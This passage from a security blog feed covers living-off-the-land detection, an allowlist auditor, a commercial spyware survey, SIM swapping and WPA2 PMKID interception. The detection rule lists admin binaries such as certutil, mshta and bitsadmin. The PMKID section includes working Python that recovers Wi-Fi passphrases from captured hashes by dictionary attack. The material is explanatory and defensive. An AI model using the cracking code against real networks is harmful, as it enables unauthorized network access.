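# Constructed EDR/Sysmon-style process-creation events as JSON lines.
# These are sample records written for this example, not real telemetry.
SAMPLE_EVENTS = r"""
{"ts": "2024-03-19T10:15:00", "host": "PAW-01", "user": "CORP\\adm.jsmith", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -hashfile C:\\Installers\\agent.msi SHA256"}
{"ts": "2024-03-19T10:22:00", "host": "WS-117", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -hashfile C:\\Users\\jdoe\\Downloads\\setup.exe SHA256"}
{"ts": "2024-03-20T03:40:00", "host": "WS-203", "user": "CORP\\adm.jsmith", "image": "C:\\Windows\\System32\\wbem\\wmic.exe", "cmdline": "wmic.exe process list brief"}
{"ts": "2024-03-19T10:30:00", "host": "WS-117", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"}
""".strip().splitlines()

# Hypothetical baseline for the example organization: which accounts may run
# administrative tools, from which privileged access workstations (PAWs), and when.
BASELINE = {
    "admin_accounts": {"corp\\adm.jsmith"},
    "paw_hosts": {"PAW-01", "PAW-02"},
    # A short, illustrative subset of administrative binaries; a real rule would
    # draw on the full LOLBAS list and the organization's own tool inventory.
    "lolbins": {"certutil.exe", "wmic.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"},
    "business_hours": (8, 19),  # local hours; start inclusive, end exclusive
}


def parse_event(line: str) -> dict:
    """Decode one JSON event line and add the lower-cased image basename for matching."""
    event = json.loads(line)
    event["basename"] = event["image"].rsplit("\\", 1)[-1].lower()
    return event


def evaluate(event: dict, baseline: dict = BASELINE) -> list:
    """Return the reasons an event deviates from the baseline; an empty list means no alert.

    Only administrative tools are examined, so ordinary user processes never
    reach the account, host and time checks: this is what keeps the rule narrow."""
    if event["basename"] not in baseline["lolbins"]:
        return []
    reasons = []
    if event["user"].lower() not in baseline["admin_accounts"]:
        reasons.append("admin tool run by non-administrative account")
    if event["host"].upper() not in baseline["paw_hosts"]:
        reasons.append("admin tool run outside a privileged access workstation")
    hour = datetime.fromisoformat(event["ts"]).hour
    start, end = baseline["business_hours"]
    if not start <= hour < end:
        reasons.append("admin tool run outside business hours")
    return reasons


def run_detection(lines, baseline: dict = BASELINE) -> list:
    """Apply the targeted rule to every event and collect the alerts it raises."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reasons = evaluate(event, baseline)
        if reasons:
            alerts.append({"ts": event["ts"], "host": event["host"], "user": event["user"],
                           "image": event["basename"], "reasons": reasons})
    return alerts


def broad_rule_alert_count(lines) -> int:
    """The overly broad "CommandLine=*" style rule: it fires on every event that has a command line."""
    return sum(1 for line in lines if parse_event(line).get("cmdline"))


if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(f'{alert["ts"]} {alert["host"]} {alert["user"]} {alert["image"]}: {"; ".join(alert["reasons"])}')
    print("targeted rule alerts:", len(run_detection(SAMPLE_EVENTS)),
          "| broad rule alerts:", broad_rule_alert_count(SAMPLE_EVENTS))
```

On the four constructed events the targeted rule raises two alerts, each with the specific baseline deviations an analyst needs (a non-admin account running certutil on a regular workstation; an admin account using wmic off a PAW at 03:40), while the catch-all rule fires four times, including on notepad, which is exactly the noise the post warns against.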

How to defend against LotL

The very nature of these attacks makes it almost impossible to prevent them completely. However, proper configuration of your network, endpoints, applications, and accounts can dramatically narrow the attack surface, speed up detection, and minimize the damage caused by intrusion attempts.

Review and implement “hardening” recommendations from vendors of the hardware and applications you use. The following should be considered as the minimum:

For Windows systems, apply Microsoft updates promptly.
For Linux systems, review permissions for key applications and daemons by following an industry guide – such as Red Hat Enterprise Linux Benchmarks.
For macOS devices, be aware that there are no generally accepted hardening recommendations, but there is a misconception that they’re secure out-of-the-box. In mixed networks, Windows devices are often more prevalent, such that IT and InfoSec tend to focus on Windows, overlooking threats and suspicious events on Apple devices. Besides the advice to regularly update macOS to the latest version and implement EDR/EPP, we recommend studying the macOS Security Compliance Project, which lets you generate InfoSec recommendations for specific macOS devices.
For organizations that actively use Microsoft 365 and Google Workspace cloud services, it’s vital to implement the minimum InfoSec recommendations from Microsoft and Google.
Critical IT assets, such as ADFS and ADCS for Microsoft-based IT systems, warrant special attention and in-depth analysis of possible hardening measures.
Widely apply universal hardening measures such as minimizing the number of running services, the principle of least privilege, and encryption and authentication of all network communications.

Make the allowlisting (aka default deny) approach standard. If implementing it across all applications and all computers is troublesome, try a phased approach. Popular LOLBAS that your team doesn’t use for work and your system processes don’t need can be blocked. The tools that actually are needed should only be available to administrators, only on relevant systems, and only for the duration of administrative tasks. All sessions that use such tools must be carefully logged and analyzed for anomalies.
 
Conduct an in-depth inventory of configurations, policies, and software installed on each host. If an application isn’t needed on a host, remove it: this will take it out of the toolkit of attackers and eliminate the headaches associated with updates and vulnerabilities. EDR solutions are ideal for this task.
Strengthen IT and OT network segmentation and monitoring at the internal network level. Besides isolating the OT network, you can move administrative machines with high privileges, important servers and the like to a separate subnet.

When implementing such restrictions, many organizations allowlist excessively broad IP ranges, for example, all addresses of a particular cloud provider. Even if this cloud hosts legitimate servers that the company server needs to communicate with, neighboring IPs could be leased by attackers. Therefore, it’s imperative to specify precise IP ranges and keep the allowlist as short as possible.
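The allowlisting advice above (default deny, precise IP ranges, the shortest list possible) is easy to state and easy to get wrong in a firewall rule. The script below is an added example written for this post, not code from Kaspersky or any product: it audits an allowlist for entries that admit far more addresses than intended and shows that a provider-wide range also admits a neighboring address the company never meant to trust. The allowlists use documentation ranges and a placeholder `/8` standing in for “the whole cloud provider”, and the 256-address threshold is a hypothetical policy value.

```python
"""Audit an IP allowlist for overly broad entries (added example)."""
import ipaddress

# Constructed allowlists. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for the company's own cloud-hosted servers; 203.0.0.0/8 is a
# placeholder for "every address of the cloud provider", the weak setting.
WEAK_ALLOWLIST = ["203.0.0.0/8", "198.51.100.0/24"]
PRECISE_ALLOWLIST = ["203.0.113.17", "203.0.113.32/28", "198.51.100.7"]

# Hypothetical policy threshold: an entry admitting more than this many
# addresses is treated as too broad for an inter-segment or host firewall rule.
MAX_ADDRESSES_PER_ENTRY = 256


def parse_entry(entry: str):
    """Parse a bare address or CIDR block; a bare address becomes a /32 (or /128)."""
    return ipaddress.ip_network(entry, strict=False)


def audit_allowlist(entries, max_addresses: int = MAX_ADDRESSES_PER_ENTRY) -> list:
    """Return (entry, reason) pairs for entries that should not be in an allowlist."""
    findings = []
    for entry in entries:
        try:
            net = parse_entry(entry)
        except ValueError:
            findings.append((entry, "not a valid address or CIDR block"))
            continue
        if net.num_addresses > max_addresses:
            findings.append((entry, f"admits {net.num_addresses} addresses; specify precise ranges"))
    return findings


def is_allowed(entries, address: str) -> bool:
    """Would this address pass the allowlist? Used to show what a broad entry lets in."""
    ip = ipaddress.ip_address(address)
    return any(ip in parse_entry(entry) for entry in entries)


if __name__ == "__main__":
    # A constructed "neighbor" address inside the provider range but not one of ours.
    neighbor = "203.0.200.5"
    for name, entries in (("weak", WEAK_ALLOWLIST), ("precise", PRECISE_ALLOWLIST)):
        print(f"{name} allowlist: findings={audit_allowlist(entries)} "
              f"admits neighbor {neighbor}={is_allowed(entries, neighbor)}")
```

The precise list passes the audit and rejects the neighboring address; the weak list is flagged for the `/8` entry and lets the neighbor through, which is the scenario the paragraph above describes: an address leased to someone else inside the same provider range inheriting the company’s trust.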

Network analysis tools should also be used to monitor traffic between segments, with a focus on unusual sessions and communications with more important network segments. Such analysis requires deep packet inspection (DPI).

To significantly simplify monitoring and to make attacks much harder, introduce privileged access workstations (PAWs) in your organization. High-risk administrative actions should be allowed on these and nowhere else. As part of the minimum program for Windows environments, operations with Active Directory servers should be allowed from PAWs only.

Implement authentication and authorization for all human-machine and machine-machine interactions regardless of their network location.
Implement a comprehensive approach to infrastructure protection based on detection and response tools (SIEM + EDR), building both awareness and team expertise (threat intelligence + cybersecurity training), and continuous hardening of the company’s overall InfoSec posture.


What commercial spyware is, and what different types there are | Kaspersky official blog

Commercial spyware has of late been making the headlines with increasing frequency. And we’re not just talking about media channels dedicated to IT or cybersecurity; reports on commercial spyware have been appearing regularly in mainstream media for some time now.

In this post, we discuss the existing commercial spyware packages, how they operate, what they’re capable of, and why they’re dangerous. And as always, we finish with advice on how to defend against them.

What is commercial spyware?

Let’s start with a definition. Commercial spyware is legal malware created by private companies and designed to conduct targeted surveillance and collect sensitive data from users’ devices. The standard tasks of commercial spyware include stealing messages, eavesdropping on calls, and tracking location.

To install commercial spyware on a victim’s device, attackers often use zero-day vulnerabilities, and in many cases — zero-click exploits, which make infection possible without requiring any action on the part of the victim.

Spyware always tries to be as inconspicuous as possible, for the longer the victim remains unaware of the infection, the more information attackers can gather. Moreover, commercial spyware often includes tools for removing traces of infection, so victims may not even suspect afterward that someone was monitoring them.

Although commercial spyware is developed by private companies, they typically sell it to various government organizations — primarily law enforcement and other security agencies.

As a result, commercial spyware is used, among other things, to monitor civilian activists, journalists, and other non-criminal individuals. In fact, that’s exactly why spyware programs regularly make the headlines.

1. Pegasus — NSO Group

Targeted OS: iOS, Android

Zero-day vulnerability exploitation: Apple iOS, Apple Safari, WhatsApp, Apple iMessage

Zero-click exploit use: yes

Country of origin: Israel

Alternative names: Chrysaor, DEV-0336, Night Tsunami

Now let’s talk about specific companies, starting with the most prominent player in the commercial spyware market — the notorious Israeli NSO Group, developer of the iOS spyware Pegasus, and its Android version Chrysaor. The early version of Pegasus, discovered in 2016, required the victim to click on a sent link, which opened a malicious page in a browser, which in turn triggered an automatic infection mechanism using the Trident exploit.

How Pegasus attacks were conducted in 2016. Source

The ability to infect iPhones using zero-click exploits quickly became a hallmark of Pegasus. For example, a few years ago, an attack on Apple smartphones exploited a vulnerability in WhatsApp voice calls activated with a series of malicious packets. The vulnerability, in turn, enabled remote code execution on the targeted device.

The FORCEDENTRY exploit, discovered by Citizen Lab in 2021 and thoroughly researched by the Google Project Zero team, is the most notorious. It was designed to attack the Apple iMessage system, enabling spyware to be launched on the victim’s iPhone after sending them a message containing a GIF file.

However, this file wasn’t an animated image at all but rather an infected PDF document in which a compression algorithm was used. When the victim’s smartphone attempted to preview the document, a vulnerability in the program responsible for handling this compression algorithm was triggered, leading to execution of a chain of exploits and, ultimately, infection of the device.

After this exploit was discovered, Apple patched the vulnerabilities. However, as it later turned out, NSO Group simply moved on to exploit vulnerabilities in other applications as if nothing had happened. In April 2023, the same Citizen Lab published research on the FINDMYPWN and PWNYOURHOME exploits. The former was linked to a vulnerability in Apple’s Find My app, while the latter targeted its HomeKit. However, the ultimate target for both of these exploits was the same: the iMessage messaging system.

Lockdown Mode messages about blocking PWNYOURHOME exploit attacks. Source

Finally, in September 2023, Citizen Lab released information about another exploit used by NSO Group: BLASTPASS. This exploit works similarly — also activating a vulnerability in iMessage — but this time related to the mechanism for sending Apple Wallet objects, such as event tickets, in messages.

Regardless of the specific attack vector, infection results in attackers gaining access to the victim’s messages, intercepting calls, stealing passwords, and tracking location. The geographical reach of this spyware is massive — and the corresponding section of the Pegasus Wikipedia entry occupies an impressive amount of space.

2. DevilsTongue, Sherlock — Candiru

Targeted OS: Windows, macOS, iOS, Android

Zero-day vulnerability exploitation: Microsoft Windows, Google Chrome

Zero-click exploit use: likely

Country of origin: Israel

Alternative names: SOURGUM, Caramel Tsunami, Saito Tech Ltd.

Another Israeli company that develops commercial spyware is Candiru, founded in 2014. In fact, this is only the first of the various names this cyber-espionage organization has used. Since it constantly changes its moniker, it’s likely working under a different one now. It’s known that Candiru is backed by several investors associated with NSO Group. However, unlike NSO Group, Candiru is much more secretive: the company has no website, its employees are forbidden to mention their employer on LinkedIn, and in the building where Candiru has its office, you won’t find any mention of it.

Official names changed by Candiru from 2014 to 2022. Source

Candiru’s activities have not been thoroughly studied yet — all the information we have is limited to leaked documents and a couple of incident investigations involving spyware developed by this company. For example, Microsoft’s investigation uncovered several zero-day vulnerabilities in the Windows operating system that Candiru exploited. There were also several zero-days in the Google Chrome browser, which Candiru probably exploited as well.

The company’s spyware is called DevilsTongue, and has multiple attack vectors — from hacking devices with physical access and using the man-in-the-middle method, to spreading malicious links and infected MS Office documents.

Capabilities of the DevilsTongue spyware developed by Candiru. Source

Candiru also offers a spy tool called Sherlock, which the researchers at Citizen Lab say could be a platform for zero-click attacks on various operating systems — Windows, iOS, and Android. Furthermore, there are reports that Candiru was developing spyware for attacks on macOS.

3. Alien, Predator — Cytrox / Intellexa

Targeted OS: Android, iOS

Zero-day vulnerability exploitation: Google Chrome, Google Android, Apple iOS

Zero-click exploit use: no (but something similar where the Mars complex is used)

Country of origin: North Macedonia / Cyprus

Alternative names: Helios, Balinese Ltd., Peterbald Ltd.

Alien is one of the two components of this spyware. It’s responsible for hacking the targeted device and installing the second part — necessary for setting up surveillance. This second part is called Predator — in homage to the movie.

The spyware was initially developed by Cytrox, founded in 2017. Its roots are in North Macedonia, with related subsidiary companies registered in both Israel and Hungary. Cytrox was later acquired by Cyprus-registered Intellexa, a company owned by Tal Dilian, who served 24 years in high-ranking positions in Israeli military intelligence.

The Alien/Predator spyware focuses on attacks on both the Android and iOS operating systems. According to last year’s Google Threat Analysis Group study, the developers of the Android version of Alien utilized several exploit chains — including four zero-day vulnerabilities in Google Chrome and one in Android.

Alien/Predator attacks started with messages to victims containing malicious links. Once clicked, these links directed victims to the attackers’ website, which exploited the vulnerabilities in the browser (Chrome) and OS (Android) to infect the device. It then immediately redirected the victim to a legitimate page to avoid suspicion.

Intellexa also offers the Mars spyware suite — part of which is installed on the victim’s mobile operator’s side. Once installed, Mars waits for the targeted individual to visit an HTTP page, and when they do, it uses a man-in-the-middle technique to redirect the victim to the infected site — at which point the process described in the previous paragraph triggers.

Infection by the Predator spyware using Mars occurs without any action on the part of the victim. This resembles a zero-click attack; however, in this case, additional equipment is used instead of vulnerabilities.

4. Subzero — DSIRF

Targeted OS: Windows

Zero-day vulnerability exploitation: Microsoft Windows, Adobe Reader

Zero-click exploit use: no

Country of origin: Austria

Alternative names: KNOTWEED, Denim Tsunami, MLS Machine Learning Solutions GmbH

The spyware Subzero, developed by the lengthily-named Austrian company DSR Decision Supporting Information Research Forensic GmbH (DSIRF), was first picked up by the German-speaking press back in 2021. However, it wasn’t until a year later that this spyware truly gained notoriety. In July 2022, the Microsoft Threat Intelligence team released a detailed study of spyware used by a group codenamed KNOTWEED (Denim Tsunami), which the researchers identified as DSIRF Subzero.

Slides from a DSIRF presentation detailing the capabilities of the spyware Subzero. Source

To compromise targeted systems, the Subzero malware exploited several zero-day vulnerabilities in both Windows and Adobe Reader. The attack vector typically involved sending the victim an email containing a malicious PDF file, which triggered a chain of exploits upon opening. As a result, fileless (memory-resident) spyware was launched on the victim’s device.

In the next stage, the spyware collected any passwords and other authentication credentials it could find in the infected system — from browsers, email clients, the Local Security Authority Subsystem Service (LSASS), and the Windows password manager. Presumably, these credentials were later used to gather information about the victim and set up further surveillance.

According to the researchers, the Subzero malware has been used to attack organizations in Europe and Central America since at least 2020. The researchers also noted that DSIRF not only sold spyware but also arranged for its employees to participate in the attacks.

In August 2023, it was announced that DSIRF would be shutting down. But it’s too early to rejoice just yet: it’s possible that cyber-espionage activities will be continued by DSIRF’s subsidiary — MLS, Machine Learning Solutions — which is believed to be the current owner of the Subzero spyware. By the way, the MLS website is still fully operational — unlike the DSIRF page, which was “under maintenance” at the time of writing.

5. Heliconia — Variston IT

Targeted OS: Windows, Linux

Zero-day vulnerability exploitation: Microsoft Defender, Google Chrome, Mozilla Firefox

Zero-click exploit use: no

Country of origin: Spain

Alternative names: none

Also in 2022, around the same time Microsoft published details about Subzero’s activities, Google presented its research analyzing another type of commercial spyware — Heliconia. The Google Threat Analysis Group (TAG) report described three components of this malware designed for attacks on computers running Windows or Linux.

The first part — called Heliconia Noise — exploits a vulnerability in the Google Chrome V8 JavaScript engine. Following its exploitation, Chrome’s sandbox is bypassed, and the spyware launches in the targeted system. Additionally, in the code of this part, a fragment was found mentioning Variston as the malware developer. The Google researchers believe it references the Spanish company Variston IT. This company specializes in providing information security services.

Researchers discovered a link to a company named Variston in the Heliconia code. Source

The second part of the spyware suite, which the Google researchers dubbed Heliconia Soft, exploits a vulnerability in the JavaScript engine embedded in the Windows antivirus, Microsoft Defender. This works as follows: first, the victim is sent a link to an infected PDF file containing malicious JavaScript code. This code triggers the Microsoft Defender vulnerability when the automatic scan of the downloaded PDF file starts. As a result of exploiting this vulnerability, Heliconia gains OS-level privileges and the ability to install spyware on the victim’s computer.

The third part is called Heliconia Files. It exploits a vulnerability in the XSLT processor of the Mozilla Firefox browser to attack computers running Windows or Linux. Judging by this vulnerability, which affects Firefox versions 64 through 68, the spyware was developed quite some time ago and has been in use since at least 2018.

6. Reign — QuaDream

Targeted OS: iOS

Zero-day vulnerability exploitation: Apple iOS

Zero-click exploit use: yes

Country of origin: Israel / Cyprus

Alternative names: DEV-0196, Carmine Tsunami, InReach

QuaDream is another Israeli company that develops spyware called Reign. It was founded by former employees of NSO Group, and the spyware they’ve created bears a striking resemblance to Pegasus. For example, to infect iPhones with Reign spyware, they utilize a zero-click exploit similar to FORCEDENTRY, described above.

Citizen Lab researchers have dubbed this exploit ENDOFDAYS. Apparently, this exploit utilizes vulnerabilities in iCloud Calendar as the initial attack vector, enabling attackers to discreetly infect an iPhone by sending invisible malicious invitations to the calendar.

As for the spying capabilities of the iOS version of Reign, the list looks impressive:

searching files and databases
recording calls
listening through the microphone
taking photos with either front or rear cameras
stealing passwords
generating iCloud two-factor authentication one-time codes
tracking location
erasing traces of device infection

Capabilities of the sample iOS version of the QuaDream Reign spyware analyzed by Citizen Lab. Source

According to some reports, QuaDream has also developed malware for attacking Android devices, but there’s no publicly available information about it. QuaDream’s penchant for secrecy is similar to that of Candiru. QuaDream also lacks a website, its employees are prohibited from discussing their work on social media, and the company’s office can’t be found on Google Maps.

Interestingly, QuaDream used an intermediary, the Cypriot company InReach, to sell its products. The relationship between these two companies is very complicated; at one point, they even went to court. In April 2023, shortly after publication of the Citizen Lab investigation into QuaDream, the company suddenly announced cessation of its operations; however, it’s not entirely clear yet whether this is a complete surrender or a tactical retreat.

How to defend against commercial spyware

Ensuring full protection against attacks using commercial spyware is generally challenging. However, you can at least make life harder for potential attackers. Follow these recommendations:

Regularly update the software on all your devices. First and foremost: operating systems, browsers, and messaging apps
Do not click on suspicious links — one visit to a site may be enough to infect your device
Use a VPN to mask your internet traffic — this will protect you from being redirected to a malicious site while browsing HTTP pages
Reboot regularly. Often, spyware can’t persist in an infected system indefinitely, so rebooting helps get rid of it
Install a reliable security solution on all your devices
And of course, read security expert Costin Raiu’s post for more tips on how to protect yourself from Pegasus and similar spyware


Transatlantic Cable podcast episode 339 | Kaspersky official blog

Episode 339 of the Transatlantic Cable podcast kicks off with news that several employees in TikTok were caught covertly spying on Forbes journalists. From there, the team talk about a new cooperation between governments to better tackle spyware and news that the FTC is looking at the upcoming Reddit IPO and AI training data.

To close out the podcast, the team discuss news that ‘at least 900’ websites built using Google’s Firebase cloud database may be leaking sensitive user data.

If you liked what you heard, please consider subscribing.

TikTok Spied On Forbes Journalists
Finland, Germany, Ireland, Japan, Poland, South Korea added to US-led spyware agreement
FTC investigating Reddit plan to sell user content for AI model training
900+ websites expose millions of passwords via Firebase


What is SIM swapping, and how does it threaten business? | Kaspersky official blog

Today’s topic is SIM swap fraud, aka SIM swapping. This attack method is far from new but remains a live threat because of how effective it is. SIM swapping attacks pose a serious danger to business because they enable threat actors to gain access to corporate communications, accounts, and sensitive information like financial data.

What is SIM swapping?

SIM swapping is an attack method for hijacking a mobile phone number and transferring it to a device owned by the attackers. Put simply, said attackers go to a mobile telecoms operator’s office, somehow wangle a new SIM card with the number of a victim-to-be (see below for examples of how), insert it into their own phone, and thus gain access to the target’s communications.

It’s typically text messages that are of most interest to the attackers — specifically ones that contain one-time verification codes. Having gained access, they can then log in to accounts linked to the phone number and/or confirm transactions using the intercepted codes.

As for the SIM swapping process itself, there are various approaches by the bad guys. In some cases the criminals employ the services of an accomplice working for the mobile operator. In others, they deceive an employee using forged documents or social engineering.

The fundamental issue that makes SIM swapping possible is that in today’s world, SIM cards and cell phone numbers are no longer used solely for their designated purpose: they were never intended to serve as the proof of identity they’ve evolved into.

Now, one-time codes by text are a very common means of account security, which means that all other protective measures can be rendered null and void by a fraudster who smooth-talked a store employee into issuing a new SIM card with your number. Such a threat cannot be ignored.

For the targeted organization, a SIM swapping attack can hit the bottom line hard. Cybercriminal interest in cryptocurrency assets continues to grow as they can be hijacked relatively easily and, more importantly, quickly. However, this method can be applied in more sophisticated attacks, too.

U.S. Securities and Exchange Commission loses X account

For instance, here’s a very recent case. On January 9, 2024, the U.S. Securities and Exchange Commission (SEC) posted on X (Twitter) that it had approved a Bitcoin spot exchange-traded fund (ETF).

This Bitcoin-boosting event had long been in the pipeline, so the news didn’t strike anyone as implausible. Naturally, in the wake of the announcement, the Bitcoin price soared (by roughly 10% to $48,000).

Fake post from the hacked SEC account announcing the approval of a Bitcoin ETF. Source

However, the post was later deleted and replaced with a message that the SEC account had been compromised. The next day, X issued a statement saying that the compromise was due not to a breach of its systems, but to an unidentified individual who had obtained control over a phone number associated with the @SECGov account. Most likely, the jump in the Bitcoin price caused by the fake post meant the fraudster made a killing.

Then, toward the end of January, the SEC itself officially acknowledged that its X account had been hacked by SIM swappers. On top of that, it turned out that two-factor authentication (2FA), at the request of SEC staff, had been disabled by X support in July 2023 to resolve login issues. The issues duly resolved, they then simply forgot to turn 2FA back on — so until the January incident, the account was left without additional protection.

$400 million FTX crypto heist

It was only recently revealed that one of the largest crypto heists in history was carried out using SIM swapping. We’re talking about the theft of $400 million worth of assets from the FTX crypto exchange in the fall of 2022.

Initially, many suspected that FTX founder Sam Bankman-Fried himself was behind the heist. However, the ensuing investigation showed that he appeared to have nothing to do with it. Then came the indictment of a “SIM swapping group” headed by a certain Robert Powell.

Part of the indictment in the case of the $400 million FTX SIM-swap crypto heist.

The text of the indictment gave us the details of this heist, which, incidentally, was neither the gang’s first nor its last. The list of victims of its SIM-swap operations runs into the dozens. The indictment goes on to mention at least six more cases, in addition to FTX, involving the theft of large sums of money.

Here’s how the criminals operated: first, they selected a suitable victim and obtained their personal information. Next, one of the perpetrators forged documents in the victim’s name, but with the photo of another criminal — the one doing the actual SIM swap.

That criminal then paid a visit to the victim's mobile operator's office and got a replacement SIM card. Text messages with confirmation codes sent to the victim's number were then intercepted and used to log in to the victim's accounts and approve transactions transferring assets to the gang. Interestingly, the very next day after the FTX heist, the group robbed a private individual in exactly the same way, this time for a modest-by-comparison $590,000.

How to guard against SIM swapping

As we see, in cases involving serious amounts of money, your SIM card and, accordingly, 2FA through one-time codes by text become the weak link. As the above examples show, SIM swapping attacks can be extremely effective; therefore, threat actors will doubtless continue to use them.

Here’s what to do to protect yourself:

Wherever possible, instead of a phone number, use alternative options to link your accounts.
Be sure to turn on notifications about account logins, pay close attention to them, and respond to suspicious logins as quickly as possible.
Again, where possible, avoid using 2FA with one-time codes by text.
For your 2FA needs, it’s better to use an authenticator app and a FIDO U2F hardware key — commonly called YubiKeys after the best-known brand.
Always use strong passwords to protect your accounts – this means unique, very long, and preferably randomly generated. To generate and store them, use a password manager.
And remember to protect those devices where passwords are stored and authenticator apps are installed.

Kaspersky official blog – ​Read More

How Wi-Fi WPA2 is hacked using PMKID interception | Kaspersky official blog

Being concerned about the security of your wireless network is not as paranoid as some may think it is. Many routers have a setting enabled by default that makes your WPA/WPA2-protected Wi-Fi network rather vulnerable. In this post, we’ll discuss one of the most effective methods of hacking wireless networks that exploits this setting, and how to protect against it.

The simplest and most effective attack on WPA/WPA2-PSK: PMKID interception

PMKID interception is the most effective and easiest-to-execute attack on wireless networks protected by WPA/WPA2-PSK (the "Personal" mode, where everyone shares one Wi-Fi password), and it is very hard to detect, because the attacker never has to touch a legitimate client device or knock anyone off the network. In essence, the attacker's laptop simply asks the router to start a connection, and the router answers with a value derived from the Wi-Fi password: the PMKID. Note that this is not the password in encrypted form but a one-way hash computed from it. Having captured that hash, the attacker can guess passwords offline until one produces the same value, and then connect to the Wi-Fi network with it.

This attack can also be carried out on a large scale using a technique called wardriving. Here, the attacker drives around a city scanning all available wireless networks and collecting the PMKIDs their routers hand out; no devices need to be connected to those networks at the time. Not much equipment is required for this: a laptop, a long-range Wi-Fi adapter that supports monitor mode and packet injection, and a decent antenna.

The captured hashes can be cracked on the go. But an attacker may prefer to wait until they're home and feed all the garnered hashes into a password-cracking tool on a high-performance computer (or rent GPU time in the cloud). The effectiveness of this attack was recently demonstrated in Hanoi: a Vietnamese hacker scanned around 10,000 wireless networks and managed to crack the passwords for half of them.

This is all you need to hack 5000 wireless networks using PMKID interception.

How is it even possible to hack Wi-Fi using PMKID interception?

So why do wireless routers hand out a value derived from the Wi-Fi password at all? The PMKID is a standard element of the WPA2 (802.11i) security design, where it serves as a cache identifier for a previously negotiated key, and it is the basis of the 802.11r fast-roaming feature, which most routers implement and usually enable by default. Fast roaming lets a client device that moves between access points of the same network skip the full authentication and reconnect quickly. To make that work, an access point includes the PMKID in the very first message of the connection handshake (the first EAPOL frame) that it sends to any device attempting to associate, including an attacker's laptop that has no intention of completing the handshake.

This identifier is derived from the Pairwise Master Key (PMK). More precisely, it is the first 128 bits of an HMAC-SHA1 computed with the PMK as the key over the fixed string "PMK Name" followed by the MAC addresses of the access point and of the client. The PMK itself, in WPA/WPA2-PSK, is computed from the Wi-Fi password with the PBKDF2 function (4096 iterations of HMAC-SHA1), using the network name (SSID) as the salt.

In other words, the PMKID contains the wireless network password hashed twice over. In theory, a hash function is one-way, meaning it's impossible to recover the original data from the resulting value. Presumably, the designers of the standard relied on this when they allowed the PMKID to travel over the air in the clear.

However, a one-way hash can still be attacked by guessing: the attacker hashes candidate passwords in exactly the same way the router does and checks which one yields the captured PMKID. The 4096 PBKDF2 iterations slow each guess down, but a single modern GPU still tries on the order of a million passwords per second, and people rarely use particularly strong passwords for wireless networks, often relying on fairly predictable combinations of characters instead. The designers of the standard evidently didn't take this into account.

This problem was discovered in 2018 by Jens Steube, lead developer of one of the most popular password recovery utilities (in other words, a password-cracking tool), Hashcat. Since then, specialized tools such as hcxdumptool and hcxtools have been developed for capturing PMKIDs and converting them into a format Hashcat can crack, and Hashcat itself gained a dedicated mode (22000) for the task.

Successful extraction of the password "hashcat!" from the intercepted PMKID of a wireless network.

Thus, in practice, the attacker captures the PMKID and then runs a dictionary attack against it: rather than trying every possible string, they hash the most common passwords, collected in large lists from past breaches, typically combined with "rules" that append digits or swap letters, and compare each result with the captured value. The attack fails only if the real password is neither in the dictionary nor produced by the rules.
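To make the derivation concrete, here is a small Python example, added for this post and not taken from Kaspersky or from the Hashcat project, that computes a PMKID exactly as a WPA2-PSK access point does, writes it out in Hashcat's mode-22000 line format, and then runs a dictionary attack on it. The network name, MAC addresses, passphrase and wordlist are all constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Added example (not from the Kaspersky post or from Hashcat): derive a PMKID the
# way a WPA2-PSK access point does, and run a dictionary attack against a captured
# one. SSID, MAC addresses, passphrase and wordlist below are all constructed.

PMKID_LABEL = b"PMK Name"  # fixed label defined by the 802.11 standard


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so a default network name makes precomputation possible."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)."""
    return hmac.new(pmk, PMKID_LABEL + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def to_22000_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """Serialise a PMKID in Hashcat's mode-22000 line format:
    WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***  (type 01 = PMKID, no EAPOL data)."""
    return "*".join(["WPA", "01", pmkid.hex(), mac_ap.hex(), mac_sta.hex(),
                     ssid.encode("utf-8").hex(), "", "", ""])


def parse_22000_line(line: str) -> dict:
    """Parse a type-01 (PMKID) line back into its components."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a WPA*01 (PMKID) line")
    pmkid = bytes.fromhex(fields[2])
    mac_ap, mac_sta = bytes.fromhex(fields[3]), bytes.fromhex(fields[4])
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("malformed PMKID or MAC field")
    return {"pmkid": pmkid, "mac_ap": mac_ap, "mac_sta": mac_sta,
            "ssid": bytes.fromhex(fields[5]).decode("utf-8")}


def crack_pmkid(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate exactly as the AP would and compare.
    Returns the matching passphrase, or None if the wordlist is exhausted."""
    target = parse_22000_line(line)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA-PSK passphrase length rules
            continue
        pmk = derive_pmk(candidate, target["ssid"])
        guess = derive_pmkid(pmk, target["mac_ap"], target["mac_sta"])
        if hmac.compare_digest(guess, target["pmkid"]):
            return candidate
    return None


# --- Constructed sample "capture", shaped like a capture tool's 22000 output ---
SAMPLE_SSID = "HomeNet-2F"                      # constructed SSID
SAMPLE_MAC_AP = bytes.fromhex("0a1b2c3d4e5f")   # constructed AP MAC
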